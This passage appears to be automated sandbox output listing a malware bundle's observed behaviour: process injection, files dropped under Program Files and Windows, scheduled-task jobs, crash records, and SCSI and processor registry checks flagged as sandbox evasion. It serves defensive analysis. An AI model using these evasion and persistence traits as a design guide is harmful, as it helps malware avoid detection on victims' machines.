Wed15e2f113a40ce5.exepostback.exeInstall.exeohd5DBCBKYGq0Rq0oGsWYQsB.exeservices64.exeRUW_kzSDDh7kY9iBvGNxl4kc.exeHelper.exe4F3B.exe3E81.exeyWwu4lJ0uJadAHnVzpydnDkG.exetmp9413_tmp.exedescription pid process target process PID 1676 set thread context of 5560 1676 Wed15e2f113a40ce5.exe Wed15e2f113a40ce5.exe PID 4208 set thread context of 3272 4208 postback.exe explorer.exe PID 5304 set thread context of 4660 5304 Install.exe Install.exe PID 5452 set thread context of 6576 5452 ohd5DBCBKYGq0Rq0oGsWYQsB.exe WerFault.exe PID 2112 set thread context of 5864 2112 services64.exe explorer.exe PID 6160 set thread context of 5012 6160 RUW_kzSDDh7kY9iBvGNxl4kc.exe RUW_kzSDDh7kY9iBvGNxl4kc.exe PID 6944 set thread context of 7320 6944 Helper.exe Helper.exe PID 5328 set thread context of 4116 5328 4F3B.exe 4F3B.exe PID 5100 set thread context of 5952 5100 3E81.exe 3E81.exe PID 2940 set thread context of 6016 2940 yWwu4lJ0uJadAHnVzpydnDkG.exe yWwu4lJ0uJadAHnVzpydnDkG.exe PID 4512 set thread context of 2208 4512 tmp9413_tmp.exe tmp9413_tmp.exe -
Drops file in Program Files directory 64 IoCs
Processes:
autosubplayer.exeautosubplayer.exedata_load.exedata_load.exepowershell.exeSayma.exepowershell.exelighteningplayer-cache-gen.exeSharefolder.exedescription ioc process File created C:\Program Files (x86)\lighteningplayer\plugins\control\liboldrc_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libmosaic_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\extensions\VLSub.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.json autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\spu\libmarq_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\librawdv_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll autosubplayer.exe File created C:\Program Files\temp_files\data.dll data_load.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_config_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libdirectsound_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\spu\libsubsdelay_plugin.dll autosubplayer.exe File opened for modification C:\Program Files\temp_files\OnpGSK.dll data_load.exe File opened for modification C:\Program Files (x86)\OnpGSK\cache.dat powershell.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\Back-48.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\vimeo.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_stl_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac autosubplayer.exe File created C:\Program Files (x86)\Reference Assemblies\Mitazhyqaefy.exe Sayma.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\twitch.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\OnpGSK\OnpGSK.dll powershell.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\vimeo.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_window.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.json autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\bbc_co_uk.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\plugins.dat.13148 lighteningplayer-cache-gen.exe File created C:\Program Files\temp_files\bckf.fon data_load.exe File created C:\Program Files (x86)\Reference Assemblies\Mitazhyqaefy.exe.config Sayma.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\01_googleimage.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_flac_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libhttps_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\intf\luac.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\liveleak.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\d3d11\libdirect3d11_filters_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\Windows Photo Viewer\Vilabywiha.exe Sharefolder.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\view.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\d3d11\libdirect3d11_filters_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mlp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\extensions\VLSub.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libfingerprinter_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawdv_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll autosubplayer.exe -
Drops file in Windows directory 32 IoCs
Processes:
msiexec.exeMsiExec.exesvchost.exerundll32.exerundll32.exeWerFault.exesvchost.exedescription ioc process File opened for modification C:\Windows\Installer\MSI6BB1.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF1686FE2365B2E6E9.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIA024.tmp msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File opened for modification C:\Windows\Tasks\SA.DAT svchost.exe File opened for modification C:\Windows\Tasks\OnpGSK.job rundll32.exe File created C:\Windows\Installer\342f6.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI963F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9C5B.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\342f6.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIE3C8.tmp msiexec.exe File created C:\Windows\Tasks\OnpGSK.job rundll32.exe File opened for modification C:\Windows\Installer\MSIE63A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID197.tmp msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Installer\MSI6257.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6A39.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI899B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9340.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIA035.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFD6F4261E49559086.TMP msiexec.exe File opened for modification C:\Windows\Tasks\SA.DAT svchost.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI65E3.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFE5994C1F854033A3.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI4F88.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5FE5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI644C.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFCB03CE89E179FF1D.TMP msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 43 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3204 2412 WerFault.exe rundll32.exe 4760 4172 WerFault.exe ShadowVPNInstaller_t1.exe 5980 5072 WerFault.exe Wed15ac1df9305ded09.exe 1440 4604 WerFault.exe Wed15edb855a49.exe 812 4172 WerFault.exe ShadowVPNInstaller_t1.exe 2836 5272 WerFault.exe setup.exe 3132 4172 WerFault.exe ShadowVPNInstaller_t1.exe 5280 4172 WerFault.exe ShadowVPNInstaller_t1.exe 5244 4172 WerFault.exe ShadowVPNInstaller_t1.exe 5264 5552 WerFault.exe rundll32.exe 6516 1488 WerFault.exe rqSglvJaLP5XGFHBpG4Rc_Oz.exe 7136 5452 WerFault.exe ohd5DBCBKYGq0Rq0oGsWYQsB.exe 4540 1484 WerFault.exe KH_hTf7gZq3Wmprg77dfBrV9.exe 3708 5192 WerFault.exe Vg807KHIlrePhVsM_k1biafy.exe 7200 1012 WerFault.exe AArNg9PA04WFChdxcAiYLZOu.exe 7512 4264 WerFault.exe tYebFztzNZipmvbK7t_wj8Yf.exe 7664 5132 WerFault.exe V0r_jI4hAYH6tmEtRu0LFAGe.exe 7908 3856 WerFault.exe GcleanerEU.exe 8100 5648 WerFault.exe vc.exe 7548 1208 WerFault.exe B3RxkzspLWh_9RBfJF39ZXl3.exe 4192 7740 WerFault.exe rundll32.exe 2240 2188 WerFault.exe gcleaner.exe 1472 4172 WerFault.exe ShadowVPNInstaller_t1.exe 6464 4172 WerFault.exe ShadowVPNInstaller_t1.exe 1452 4172 WerFault.exe ShadowVPNInstaller_t1.exe 7788 4172 WerFault.exe ShadowVPNInstaller_t1.exe 1472 4172 WerFault.exe ShadowVPNInstaller_t1.exe 1000 4172 WerFault.exe ShadowVPNInstaller_t1.exe 5176 4172 WerFault.exe ShadowVPNInstaller_t1.exe 6956 4172 WerFault.exe ShadowVPNInstaller_t1.exe 912 2656 WerFault.exe OUwWzxudrdRKwfe4TAMw2v9N.exe 2200 4172 WerFault.exe ShadowVPNInstaller_t1.exe 6996 1160 WerFault.exe rundll32.exe 3984 6804 WerFault.exe ECpQxvrk7QdfeLYkQ6sFcXH5.exe 4704 3976 WerFault.exe 6FWMzlXnCtqJ3wOoKIv1m2Cg.exe 7420 6736 WerFault.exe E747.exe 1280 5128 WerFault.exe 231A.exe 21976 21652 WerFault.exe rundll32.exe 22616 20536 WerFault.exe GcleanerEU.exe 22672 20620 WerFault.exe gcleaner.exe 23844 22148 WerFault.exe InternodesPiets_2021-09-29_21-00.exe 17200 17104 WerFault.exe E1BD.exe 17508 17428 WerFault.exe 14.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vssvc.exesvchost.exe3E81.exeRUW_kzSDDh7kY9iBvGNxl4kc.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000312b64fa169c92a50000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000400600000000ffffffff000000002700010000080000312b64fa00000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005006000000000000a0f93f000000ffffffff000000000701010000280300312b64fa00000000000050060000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000312b64fa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000312b64fa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\DeviceDesc svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3E81.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI RUW_kzSDDh7kY9iBvGNxl4kc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI RUW_kzSDDh7kY9iBvGNxl4kc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3E81.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3E81.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Mfg svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Device Parameters vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI RUW_kzSDDh7kY9iBvGNxl4kc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags svchost.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exerundll32.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeXanobezhyju.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 